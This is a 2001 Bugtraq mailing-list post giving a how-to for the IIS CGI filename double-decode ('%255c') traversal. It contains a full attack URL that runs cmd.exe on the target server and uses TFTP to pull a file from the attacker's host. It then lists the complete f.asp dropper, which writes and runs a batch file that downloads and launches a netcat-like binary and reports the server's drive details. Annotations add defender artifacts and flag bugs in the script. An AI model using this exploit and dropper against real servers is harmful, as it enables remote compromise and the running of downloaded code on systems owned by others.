Bugtraq mailing list archives

Microsoft IIS CGI Filename Decode Error V - How to


From: Adriano Dias <adias () proteus com br>
Date: Thu, 17 May 2001 09:01:59 -0300

That's what I did. The request below abuses the double decoding of `%255c` (`%25` → `%`, then `%5c` → `\`) to traverse out of /msadc/ to cmd.exe, and uses cmd.exe to TFTP f.asp from the attacker's host into the scripts directory:
http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp

Then I requested http://192.168.0.1/f.asp

Following is a copy of f.asp (note that the listing is mail-wrapped; two statements are split across lines):


----------cut here-------------------------
<%
' Dropper stage of the IIS double-decode ("%255c") traversal described above.
' Uploaded to \Inetpub\scripts via TFTP from cmd.exe, then requested over HTTP.
' What it does: picks the ready drive with the most free space, writes dl.bat next
' to itself, runs dl.bat (which fetches and starts nc0.exe, presumably a netcat
' build), and echoes the chosen drive's details back to the requesting client.
' Defender notes: artifacts are f.asp, dl.bat and nc0.exe in \Inetpub\scripts,
' IIS log entries containing "..%255c" and "cmd.exe", and outbound TFTP transfers.
' NOTE(review): this listing is mail-wrapped; two statements below are split
' across lines and must be rejoined before the script parses.
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
' dmax = letter of the chosen drive, dmac = its free space; dmab/dmaa/dmad hold
' the type, total size and serial number of that same drive.
dmax = ""
dmac = 0
For each d in drv
' Skip drive A (typically the floppy) and any drive that is not ready.
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
' dl.bat is created in the same directory as this page (Server.MapPath resolves
' relative to the script), i.e. \Inetpub\scripts; True overwrites an existing file.
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
' NOTE(review): a batch label needs a leading colon (":startDL"); written as
' "startDL:" cmd.exe treats it as a command, and the "goto startDL" below fails.
tf.WriteLine("startDL:")
' Pull ncx99.exe from the attacker's TFTP server and save it as nc0.exe. The host
' here (192.168.1.33) differs from the 192.168.0.2 used in the initial request.
' NOTE(review): mail-wrapped - this literal is a single line in the real file.
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
' NOTE(review): the retry loop tests for ncx99.exe, but the transfer saves the
' file as nc0.exe, so a successful download never satisfies this check.
tf.WriteLine("if not exist ncx99.exe goto startDL")
' Run the downloaded binary and wait for it to exit before cleaning up.
tf.WriteLine("start /w nc0.exe")
' Clear read-only bits, then remove TFTP transfer leftovers (nc0.exe is kept).
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
' The drive letter is passed as %1, although dl.bat as written never reads it.
command = server.mappath("dl.bat") & " " & dmax
' Errors from CreateObject or Run (e.g. WScript.Shell unavailable to the IIS
' account) are handled below instead of surfacing as a server error.
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
' Launch failed: remove dl.bat so it is not left on disk.
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
' Report "|letter*type*free*total*serial" to the caller.
' NOTE(review): mail-wrapped - this statement is a single line in the real file.
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>

-----------cut here----------------------

